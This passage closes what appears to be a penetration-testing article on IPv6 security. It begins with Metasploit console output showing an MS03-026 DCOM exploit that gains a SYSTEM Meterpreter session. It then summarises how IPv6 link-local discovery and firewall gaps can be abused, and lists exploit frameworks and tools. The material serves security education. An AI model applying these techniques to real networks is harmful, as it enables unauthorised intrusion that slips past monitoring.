[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Summary

Key Concepts

- Even though most networks are not "IPv6 ready", many of the machines on those networks are. The introduction of a new protocol stack brings security challenges that are not well known and are often overlooked during security evaluations.
- The huge address range of IPv6 makes remote discovery of IPv6 machines difficult, but local network discovery is still possible using the all-nodes broadcast addresses.
- Link-local addresses are tied to a specific
network link and are only guaranteed unique on the link where they reside.
- In order to communicate with an IPv6 node using a link-local address, the user must know the local scope ID (interface) for that link.
- In order for a remote application to connect back to the user over a link-local address, the socket code must specify the local scope ID of the correct interface.
- UDP services which listen on the IPv6 ANY address (::0) will respond to client requests sent to the all-nodes broadcast address (ff02::1), which differs from IPv4.
- IPv6 broadcast (link-scope multicast) traffic is not routable, which limits many attacks to the local network only.
- Even though many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all applications support listening on the IPv6 interfaces.
- Software firewalls often allow IPv6 traffic even when configured to block all IPv4 traffic.
- Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many other security tools now support IPv6 targets.
- It is possible to use a tool written for IPv4 against an IPv6 host by using a socket relay tool such as xinetd or socat.

Conclusion

Although the IPv6 backbone infrastructure continues to grow and an increasing number of client systems and devices support IPv6 out of the box, few ISPs are able to provide routing between the customer site and the backbone. Until this gap is closed, security assessments against IPv6 addresses will be limited to the local network. The lack of awareness about IPv6 in most organizations can provide an easy way for an attacker to bypass network controls and fly under the radar of many security monitoring tools. After all, when confronted with the message below, what is an administrator to do?

Last login: Sat Oct 1 11:32:45 2008 from fe80::214:4fff:fe4a:3a30%eth0

IPv6 Resources

Exploits
THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
The Metasploit Framework - http://metasploit.com
Immunity CANVAS - http://www.immunitysec.com/

Tools
ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest)
socat - http://www.dest-unreach.org/socat/
scapy - http://www.secdev.org/projects/scapy/
nmap - http://nmap.org/
nikto - http://www.cirt.net/nikto2

Documentation
RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt
Official IPv6 Site - http://www.ipv6.org/

Application Compatibility
http://www.deepspace6.net/docs/ipv6_status_page_apps.html
http://www.stindustries.net/IPv6/tools.html
http://www.ipv6.org/v6-apps.html
http://applications.6pack.org/browse/support/